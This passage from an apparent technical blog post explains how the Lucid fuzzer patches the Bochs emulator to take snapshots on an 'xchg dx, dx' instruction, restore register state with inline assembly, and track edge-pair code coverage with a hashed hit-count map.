        <span class="k">self</span><span class="py">.map_base</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.map_base</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.map_length</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.map_length</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.brk_base</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.brk_base</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.brk_size</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.brk_size</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.curr_brk</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.curr_brk</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.mmap_base</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.mmap_base</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.mmap_size</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.mmap_size</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.curr_mmap</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.curr_mmap</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.next_mmap</span> <span class="o">=</span> <span class="n">mmu</span><span class="py">.next_mmap</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>We also have the GPRs of Bochs to worry about, but luckily for us, those are saved already when Bochs context switches into Lucid in order to take the snapshot.</p>

<h1 id="triggering-snapshot-operations">Triggering Snapshot Operations</h1>
<p>The next thing we need to do is determine how to invoke snapshot logic from the harness running in the guest. I decided to piggyback off of Bochs’ approach and leverage specific types of NOP instruction sequences that are unlikely to exist in your target (collisions are not likely). Bochs uses these types of NOPs as magic breakpoints for when you’re using Bochs compiled in debugger mode. They are as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">C9</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">cx</span><span class="p">,</span><span class="n">cx</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mo">001</span> <span class="mo">001</span> <span class="o">-&gt;</span> <span class="mi">1</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">D2</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">dx</span><span class="p">,</span><span class="n">dx</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mo">010</span> <span class="mo">010</span> <span class="o">-&gt;</span> <span class="mi">2</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">DB</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">bx</span><span class="p">,</span><span class="n">bx</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mo">011</span> <span class="mo">011</span> <span class="o">-&gt;</span> <span class="mi">3</span>
<span class="mi">66</span><span class="o">:</span><span class="mf">87E4</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">sp</span><span class="p">,</span><span class="n">sp</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">100</span> <span class="mi">100</span> <span class="o">-&gt;</span> <span class="mi">4</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">ED</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">bp</span><span class="p">,</span><span class="n">bp</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">101</span> <span class="mi">101</span> <span class="o">-&gt;</span> <span class="mi">5</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">F6</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">si</span><span class="p">,</span><span class="n">si</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">110</span> <span class="mi">110</span> <span class="o">-&gt;</span> <span class="mi">6</span>
<span class="mi">66</span><span class="o">:</span><span class="mi">87</span><span class="n">FF</span>  <span class="o">|</span> <span class="n">xchg</span> <span class="n">di</span><span class="p">,</span><span class="n">di</span>  <span class="o">|</span> <span class="mi">1000011111</span> <span class="mi">111</span> <span class="mi">111</span> <span class="o">-&gt;</span> <span class="mi">7</span>
</code></pre></div></div>
<p>This code is located in <code class="language-plaintext highlighter-rouge">bochs/cpu/data_xfer16.cc</code>. The <code class="language-plaintext highlighter-rouge">bxInstruction_c</code> struct has fields for this type of operation which track both the <code class="language-plaintext highlighter-rouge">src</code> register and the <code class="language-plaintext highlighter-rouge">dst</code> register. If they are the same, it checks them against their binary representation in the instruction encoding. For example <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> would mean that <code class="language-plaintext highlighter-rouge">i-&gt;src()</code> and <code class="language-plaintext highlighter-rouge">i-&gt;dst()</code> both equal 2.</p>
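<p>To see where those register numbers come from, here is a tiny standalone C sketch that pulls them out of the ModRM byte of a <code class="language-plaintext highlighter-rouge">66 87 /r</code> encoding. It is not Bochs’ decoder, just an illustration of the table above. The function name is made up, and it only handles the exact three-byte forms listed (no other prefixes).</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Returns the register number (1..7) if `bytes` starts with a 16-bit
// register-to-register `xchg` whose two operands are the same register,
// matching the table above. Returns -1 for anything else.
int magic_nop_id(const uint8_t *bytes, size_t len) {
    // 0x66 = operand-size prefix, 0x87 = xchg r/m16, r16
    if (len < 3 || bytes[0] != 0x66 || bytes[1] != 0x87)
        return -1;

    uint8_t modrm = bytes[2];
    uint8_t mod = modrm >> 6;       // top two bits: 3 means register-direct
    uint8_t reg = (modrm >> 3) & 7; // middle three bits
    uint8_t rm = modrm & 7;         // low three bits

    // The table starts at cx (1), so register 0 is excluded here.
    if (mod != 3 || reg != rm || reg == 0)
        return -1;
    return reg;
}
```

<p>For example, <code class="language-plaintext highlighter-rouge">D2</code> is <code class="language-plaintext highlighter-rouge">11 010 010</code> in binary, so both three-bit fields are 2, which is the value the snapshot check compares against.</p>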

<p>So in this instruction handler, we already have an example of how to implement logic to get Bochs to recognize instructions in the guest and <em>do something</em>.</p>

<p>We also have two types of snapshots really. One is when we use a regular “vanilla” version of Bochs with a GUI and what we’re aiming to do is “snapshot” the Bochs state to disk where we want to start fuzzing from. This is distinct from the snapshot that the fuzzer conceives of. So for instance, if you’ve built a harness like I have, you would want to boot up your system with Bochs in the GUI, get a shell, and finally run your harness. Your harness can then trigger one of these magic breakpoints to get Bochs to then save its state to disk, and this is what I’ve done.</p>

<p>Bochs has the ability to save its state to disk in the event that a user uses the “Suspend” feature, like pausing a VM. Bochs can then resume that suspended VM later in the future, great feature obviously. We can take advantage by just copy-pasta-ing that code right over to the instruction handler from where it normally lives (somewhere in the GUI simulation interface code). I think all I had to do was add an additional include to <code class="language-plaintext highlighter-rouge">data_xfer16.cc</code> and then hack in my logic as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if BX_SNAPSHOT
</span>  <span class="c1">// Check for take snapshot instruction `xchg dx, dx`</span>
  <span class="k">if</span> <span class="p">((</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="n">i</span><span class="o">-&gt;</span><span class="n">dst</span><span class="p">())</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="mi">2</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">BX_COMMIT_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">BX_CPU_THIS_PTR</span> <span class="n">async_event</span><span class="p">)</span>
      <span class="k">return</span><span class="p">;</span>
    <span class="o">++</span><span class="n">i</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">save_dir</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/tmp/lucid_snapshot"</span><span class="p">;</span>
    <span class="n">mkdir</span><span class="p">(</span><span class="n">save_dir</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Saving Lucid snapshot to '%s'...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">save_dir</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">SIM</span><span class="o">-&gt;</span><span class="n">save_state</span><span class="p">(</span><span class="n">save_dir</span><span class="p">))</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Successfully saved snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
      <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to save snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">BX_EXECUTE_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
  <span class="p">}</span>
<span class="cp">#endif
</span></code></pre></div></div>

<p>So if we build a vanilla Bochs with a GUI and define <code class="language-plaintext highlighter-rouge">BX_SNAPSHOT</code> during the build process, we should be able to make Bochs save its state to disk when it encounters an <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> instruction, as if the end-user had pressed suspend at the perfect moment, down to the instruction, in our harness.</p>

<p>Now in the fuzzer, we will tell our Bochs to resume the saved-to-disk state and, right as it’s about to emulate its first instruction in the CPU loop, break back into the fuzzer and take the sort of snapshot the fuzzer is going to use that we discussed in the previous section. This was done by hacking in some code in <code class="language-plaintext highlighter-rouge">cpu/cpu.cc</code> as follows:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">jmp_buf</span> <span class="n">BX_CPU_C</span><span class="o">::</span><span class="n">jmp_buf_env</span><span class="p">;</span>

<span class="kt">void</span> <span class="n">BX_CPU_C</span><span class="o">::</span><span class="n">cpu_loop</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="cp">#if BX_SUPPORT_HANDLERS_CHAINING_SPEEDUPS
</span>  <span class="k">volatile</span> <span class="n">Bit8u</span> <span class="n">stack_anchor</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">cpuloop_stack_anchor</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">stack_anchor</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="cp">#if BX_DEBUGGER
</span>  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">break_point</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">magic_break</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">BX_CPU_THIS_PTR</span> <span class="n">stop_reason</span> <span class="o">=</span> <span class="n">STOP_NO_REASON</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="c1">// Place the Lucid snapshot taking code here above potential long jump returns</span>
<span class="cp">#if BX_LUCID
</span>  <span class="n">lucid_take_snapshot</span><span class="p">();</span>
<span class="cp">#endif
</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">setjmp</span><span class="p">(</span><span class="n">BX_CPU_THIS_PTR</span> <span class="n">jmp_buf_env</span><span class="p">))</span> <span class="p">{</span>
    <span class="c1">// can get here only from exception function or VMEXIT</span>
    <span class="n">BX_CPU_THIS_PTR</span> <span class="n">icount</span><span class="o">++</span><span class="p">;</span>
    <span class="n">BX_SYNC_TIME_IF_SINGLE_PROCESSOR</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="cp">#if BX_DEBUGGER || BX_GDBSTUB
</span>    <span class="k">if</span> <span class="p">(</span><span class="n">dbg_instruction_epilog</span><span class="p">())</span> <span class="k">return</span><span class="p">;</span>
<span class="cp">#endif
#if BX_GDBSTUB
</span>    <span class="k">if</span> <span class="p">(</span><span class="n">bx_dbg</span><span class="p">.</span><span class="n">gdbstub_enabled</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="cp">#endif
</span>  <span class="p">}</span>
</code></pre></div></div>
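<p>The placement above <code class="language-plaintext highlighter-rouge">setjmp</code> matters. Here is a toy C sketch (all names are hypothetical, nothing here is Bochs code) showing that anything placed before the <code class="language-plaintext highlighter-rouge">setjmp</code> call runs once per loop entry, while everything after it runs again each time an “exception” long-jumps back:</p>

```c
#include <assert.h>
#include <setjmp.h>

static jmp_buf g_env;
int g_snapshot_calls; // times the pre-setjmp hook ran
int g_loop_entries;   // times execution passed the setjmp point

static void take_snapshot_stub(void) {
    g_snapshot_calls++;
}

// Simulate a CPU loop that hits `exceptions` exceptions, each of which
// long-jumps back to the setjmp point.
void run_cpu_loop(int exceptions) {
    // volatile because it is modified between setjmp and longjmp
    volatile int remaining = exceptions;

    // Above setjmp: not re-executed when longjmp returns control below.
    take_snapshot_stub();

    if (setjmp(g_env)) {
        // Arrived here via longjmp, i.e. an "exception" was raised.
    }

    g_loop_entries++;
    if (remaining > 0) {
        remaining--;
        longjmp(g_env, 1);
    }
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">run_cpu_loop(3)</code> passes the <code class="language-plaintext highlighter-rouge">setjmp</code> point four times but calls the stub only once, which is the property we want for a one-time snapshot.</p>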

<p>You can see that if we have built Bochs for the fuzzer (with <code class="language-plaintext highlighter-rouge">BX_LUCID</code> defined), we’ll call the take snapshot function before we start emulating instructions or even return from an exception via <code class="language-plaintext highlighter-rouge">longjmp</code> or similar logic. The logic of the take snapshot code is very simple, we just set some variables in the global execution context to let Lucid know why we exited the VM and what it should do about it:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Call into Lucid to take snapshot of current Bochs state</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">optimize</span><span class="p">(</span><span class="mi">0</span><span class="p">)))</span> <span class="kt">void</span> <span class="nf">lucid_take_snapshot</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="c1">// Set execution mode to Bochs</span>
    <span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">mode</span> <span class="o">=</span> <span class="n">BOCHS</span><span class="p">;</span>

    <span class="c1">// Set the exit reason</span>
    <span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_reason</span> <span class="o">=</span> <span class="n">TAKE_SNAPSHOT</span><span class="p">;</span>

    <span class="c1">// Inline assembly to switch context back to fuzzer</span>
    <span class="n">__asm__</span> <span class="p">(</span>
        <span class="s">"push %%r15</span><span class="se">\n\t</span><span class="s">"</span>          <span class="c1">// Save r15 register</span>
        <span class="s">"mov %0, %%r15</span><span class="se">\n\t</span><span class="s">"</span>       <span class="c1">// Move context pointer into r15</span>
        <span class="s">"call *(%%r15)</span><span class="se">\n\t</span><span class="s">"</span>       <span class="c1">// Call context_switch</span>
        <span class="s">"pop %%r15"</span>               <span class="c1">// Restore r15 register</span>
        <span class="o">:</span>                         <span class="c1">// No output</span>
        <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">g_lucid_ctx</span><span class="p">)</span>       <span class="c1">// Input</span>
        <span class="o">:</span> <span class="s">"memory"</span>                <span class="c1">// Clobber</span>
    <span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now Lucid can save this state as a snapshot and reset to it after each fuzzing iteration, all by virtue of just including a simple <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> instruction in your fuzzing harness, very cool stuff imo! At the end of a fuzzcase, when we’ve reset the snapshot state and we want to start executing Bochs again from the snapshot state, we just call this function via a context switch which ends with a simple <code class="language-plaintext highlighter-rouge">ret</code> instruction. This will behave as if Bochs is just returning from calling <code class="language-plaintext highlighter-rouge">lucid_take_snapshot</code> as a normal function:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Restore Bochs' state from the snapshot</span>
<span class="k">fn</span> <span class="nf">restore_bochs_execution</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set the mode to Bochs</span>
    <span class="k">let</span> <span class="n">context</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">from_ptr_mut</span><span class="p">(</span><span class="n">contextp</span><span class="p">);</span>
    <span class="n">context</span><span class="py">.mode</span> <span class="o">=</span> <span class="nn">ExecMode</span><span class="p">::</span><span class="n">Bochs</span><span class="p">;</span>

    <span class="c1">// Get the pointer to the snapshot regs</span>
    <span class="k">let</span> <span class="n">snap_regsp</span> <span class="o">=</span> <span class="n">context</span><span class="nf">.snapshot_regs_ptr</span><span class="p">();</span>

    <span class="c1">// Restore the extended state</span>
    <span class="n">context</span><span class="nf">.restore_xstate</span><span class="p">();</span>

    <span class="c1">// Move that pointer into R14 and restore our GPRs</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"mov r14, {0}"</span><span class="p">,</span>
            <span class="s">"mov rax, [r14 + 0x0]"</span><span class="p">,</span>
            <span class="s">"mov rbx, [r14 + 0x8]"</span><span class="p">,</span>
            <span class="s">"mov rcx, [r14 + 0x10]"</span><span class="p">,</span>
            <span class="s">"mov rdx, [r14 + 0x18]"</span><span class="p">,</span>
            <span class="s">"mov rsi, [r14 + 0x20]"</span><span class="p">,</span>
            <span class="s">"mov rdi, [r14 + 0x28]"</span><span class="p">,</span>
            <span class="s">"mov rbp, [r14 + 0x30]"</span><span class="p">,</span>
            <span class="s">"mov rsp, [r14 + 0x38]"</span><span class="p">,</span>
            <span class="s">"mov r8, [r14 + 0x40]"</span><span class="p">,</span>
            <span class="s">"mov r9, [r14 + 0x48]"</span><span class="p">,</span>
            <span class="s">"mov r10, [r14 + 0x50]"</span><span class="p">,</span>
            <span class="s">"mov r11, [r14 + 0x58]"</span><span class="p">,</span>
            <span class="s">"mov r12, [r14 + 0x60]"</span><span class="p">,</span>
            <span class="s">"mov r13, [r14 + 0x68]"</span><span class="p">,</span>
            <span class="s">"mov r15, [r14 + 0x78]"</span><span class="p">,</span>
            <span class="s">"mov r14, [r14 + 0x70]"</span><span class="p">,</span>
            <span class="s">"sub rsp, 0x8"</span><span class="p">,</span>             <span class="c1">// Recover saved CPU flags </span>
            <span class="s">"popfq"</span><span class="p">,</span>
            <span class="s">"ret"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">snap_regsp</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
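<p>The offsets in that assembly imply a flat save area of sixteen 8-byte slots. Here is a minimal sketch of what such a layout could look like. The struct name <code class="language-plaintext highlighter-rouge">SnapshotRegs</code> and the helper <code class="language-plaintext highlighter-rouge">field_offset</code> are made up for illustration and are not taken from Lucid's source; only the offsets come from the restore routine above:</p>

```rust
/// Hypothetical register save area. The field order is inferred from the
/// offsets used by the restore assembly, not copied from Lucid's source.
#[repr(C)]
#[derive(Default, Clone, Copy)]
pub struct SnapshotRegs {
    pub rax: u64, // 0x00
    pub rbx: u64, // 0x08
    pub rcx: u64, // 0x10
    pub rdx: u64, // 0x18
    pub rsi: u64, // 0x20
    pub rdi: u64, // 0x28
    pub rbp: u64, // 0x30
    pub rsp: u64, // 0x38
    pub r8: u64,  // 0x40
    pub r9: u64,  // 0x48
    pub r10: u64, // 0x50
    pub r11: u64, // 0x58
    pub r12: u64, // 0x60
    pub r13: u64, // 0x68
    pub r14: u64, // 0x70
    pub r15: u64, // 0x78
}

/// Byte offset of `field` inside `base` (illustrative helper).
/// `field` must be a reference to one of `base`'s own fields.
pub fn field_offset(base: &SnapshotRegs, field: &u64) -> usize {
    field as *const u64 as usize - base as *const SnapshotRegs as usize
}
```

<p>Note that the assembly loads <code class="language-plaintext highlighter-rouge">r14</code> last (after <code class="language-plaintext highlighter-rouge">r15</code>) because <code class="language-plaintext highlighter-rouge">r14</code> is holding the base pointer for every other load, so it can only be overwritten once nothing else needs it.</p>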

<p>That’s pretty much it for snapshots I think. I’m curious to see how they’ll perform in the future, but they’re doing the trick for now.</p>

<h1 id="code-coverage-feedback">Code Coverage Feedback</h1>
<p>After snapshots were settled, I moved on to implementing code coverage feedback. At first I was kind of paralyzed by the options since we have access to everything via Bochs. We know every single PC that is executed during a fuzzing iteration so really we can do whatever we want. I ended up implementing something pretty close to what old-school AFL did which tracks code coverage at two levels:</p>
<ul>
  <li>Edge pairs: These are addresses where a branch takes place. For example if the instruction at <code class="language-plaintext highlighter-rouge">0x1337</code> is a <code class="language-plaintext highlighter-rouge">jmp 0x13371337</code>, then we would have an edge pair of <code class="language-plaintext highlighter-rouge">0x1337</code> and <code class="language-plaintext highlighter-rouge">0x13371337</code>. This combination is what we’re keeping track of. Basically what is the current PC and what PC are we branching to. This also applies when we don’t take a branch, because we skip over the branching instruction and land on a new instruction instead which in its own way is a branch.</li>
  <li>Edge pair frequency: We also want to know how often these edge-pairs are accessed during a fuzzing iteration. So not only binary fidelity of “edge pair seen/edge pair not seen”, we also want frequency. We want to differentiate inputs that hit the edge pair 100x vs one that hits it 100000x during a fuzzing iteration. This added fidelity should provide us more valuable feedback vs. just rough data of edges hit vs not hit.</li>
</ul>

<p>With these two levels of introspection in mind, we had to choose a way to implement this. Luckily, Bochs can be compiled with instrumentation, and it exposes stubs for it in <code class="language-plaintext highlighter-rouge">instrument/stubs/instrument.cc</code>. Some of the stubs are particularly useful for us because they instrument branching instructions. So if you compile Bochs with <code class="language-plaintext highlighter-rouge">BX_INSTRUMENTATION</code> defined, you get those stubs compiled into the instruction handlers that handle branching instructions in the guest. Their prototypes take the current PC and the destination PC. I had to make some changes to the stub signature for the conditional-branch-not-taken instrumentation because it did not report the PC we land on (the fall-through instruction), and we need that information to form our edge-pair. Here is what the stub signatures looked like before I modified them:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{}</span>
<span class="kt">void</span> <span class="n">bx_instr_cnear_branch_not_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">)</span> <span class="p">{}</span>
</code></pre></div></div>

<p>And I changed them to:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{}</span>
<span class="kt">void</span> <span class="n">bx_instr_cnear_branch_not_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{}</span>
</code></pre></div></div>

<p>So I had to go through and change all the macro invocations in the instruction handlers to calculate a new <code class="language-plaintext highlighter-rouge">taken</code> PC for <code class="language-plaintext highlighter-rouge">bx_instr_cnear_branch_not_taken</code>, which was annoying but as far as hacking on someone else’s project goes, very easy. Here is an example from the Bochs patch file of what I changed at the call-site, you can see that I had to calculate a new variable <code class="language-plaintext highlighter-rouge">bx_address taken</code> in order to get a pair:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP);
+  bx_address taken = PREV_RIP + i-&gt;ilen();
+  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP, taken);
</code></pre></div></div>

<p>Now that we know the current PC and the PC we’re branching to in the target each time, it’s time to put that information to use. On the Lucid side in Rust, I have a coverage map implementation like this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="n">COVERAGE_MAP_SIZE</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">65536</span><span class="p">;</span>

<span class="nd">#[derive(Clone)]</span>
<span class="nd">#[repr(C)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">CoverageMap</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">curr_map</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span>          <span class="c1">// The hit count map updated by Bochs</span>
    <span class="n">history_map</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span>           <span class="c1">// The map from the previous run</span>
    <span class="n">curr_map_addr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>       <span class="c1">// Address of the curr_map used by Bochs</span>
<span class="p">}</span>
</code></pre></div></div>

<p>It’s a long array of <code class="language-plaintext highlighter-rouge">u8</code> values where each index represents an edge-pair that we’ve hit. We pass the address of that array to Bochs so that it can set the value in the array for the edge-pair it’s currently tracking. So Bochs will encounter a branching instruction, it will have a current PC and a PC it’s branching to, it’ll formulate a meaningful value for it and translate that value into an index in the coverage map array of <code class="language-plaintext highlighter-rouge">u8</code> values. At that index, it will increment the <code class="language-plaintext highlighter-rouge">u8</code> value. This process is done by hashing the two edge addresses and then doing a bitwise AND operation so that we mask off the bits that wouldn’t be an index value in the coverage map (this works because the map size is a power of two). This means we could have collisions: one edge-pair may yield the same index as a second, distinct edge-pair. But this is just a drawback associated with this strategy that we’ll have to accept. There are other ways of having non-colliding edge-pair tracking but they would require hash-lookups each time we encounter a branching instruction. This <em>may</em> be expensive, but given that we already have such a slow emulator running our target code, we may eventually switch to this paradigm, we’ll see.</p>
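<p>For comparison, here is a rough sketch of what the non-colliding approach could look like if the bookkeeping lived on the Rust side. This is not something Lucid does today; the type <code class="language-plaintext highlighter-rouge">ExactEdgeMap</code> and its methods are hypothetical names, and the counter saturates at 255 here purely as a design choice for the sketch:</p>

```rust
use std::collections::HashMap;

/// Hypothetical collision-free alternative to the fixed-size map: every
/// distinct (src, dst) pair gets its own counter, at the cost of a hash
/// lookup per branch.
#[derive(Default)]
pub struct ExactEdgeMap {
    hits: HashMap<(u64, u64), u8>,
}

impl ExactEdgeMap {
    /// Record one traversal of the edge, saturating at 255 instead of wrapping.
    pub fn record(&mut self, src: u64, dst: u64) {
        let count = self.hits.entry((src, dst)).or_insert(0);
        *count = count.saturating_add(1);
    }

    /// Hit count for an edge, or 0 if it was never seen.
    pub fn hit_count(&self, src: u64, dst: u64) -> u8 {
        self.hits.get(&(src, dst)).copied().unwrap_or(0)
    }

    /// Number of distinct edges seen so far.
    pub fn unique_edges(&self) -> usize {
        self.hits.len()
    }
}
```

<p>The trade-off is exactly the one described above: two different edges can never alias, but every branch pays for a hash-table lookup and the map grows with the number of edges instead of staying at a fixed size.</p>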

<p>For the hashing algorithm I chose a djb2-style hash (spelled <code class="language-plaintext highlighter-rouge">dbj2_hash</code> in the code), which is a weird little hashing algorithm that is fast and supposedly offers some pretty good distribution (low collision rate). So all in all we do the following:</p>
<ol>
  <li>Encounter an edge-pair via an instrumented branching instruction</li>
  <li>Hash the two edge addresses using <code class="language-plaintext highlighter-rouge">dbj2_hash</code></li>
  <li>Mask the hash value so that it is always a valid index, i.e. less than <code class="language-plaintext highlighter-rouge">coverage_map.len()</code></li>
  <li>Increase the <code class="language-plaintext highlighter-rouge">u8</code> value at <code class="language-plaintext highlighter-rouge">coverage_map[hash]</code></li>
</ol>

<p>This is how we update the map from Bochs:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">uint32_t</span> <span class="nf">dbj2_hash</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">src</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">dst</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="kt">uint32_t</span> <span class="n">hash</span> <span class="o">=</span> <span class="mi">5381</span><span class="p">;</span>
    <span class="n">hash</span> <span class="o">=</span> <span class="p">((</span><span class="n">hash</span> <span class="o">&lt;&lt;</span> <span class="mi">5</span><span class="p">)</span> <span class="o">+</span> <span class="n">hash</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="kt">uint32_t</span><span class="p">)(</span><span class="n">src</span><span class="p">);</span>
    <span class="n">hash</span> <span class="o">=</span> <span class="p">((</span><span class="n">hash</span> <span class="o">&lt;&lt;</span> <span class="mi">5</span><span class="p">)</span> <span class="o">+</span> <span class="n">hash</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="kt">uint32_t</span><span class="p">)(</span><span class="n">dst</span><span class="p">);</span>
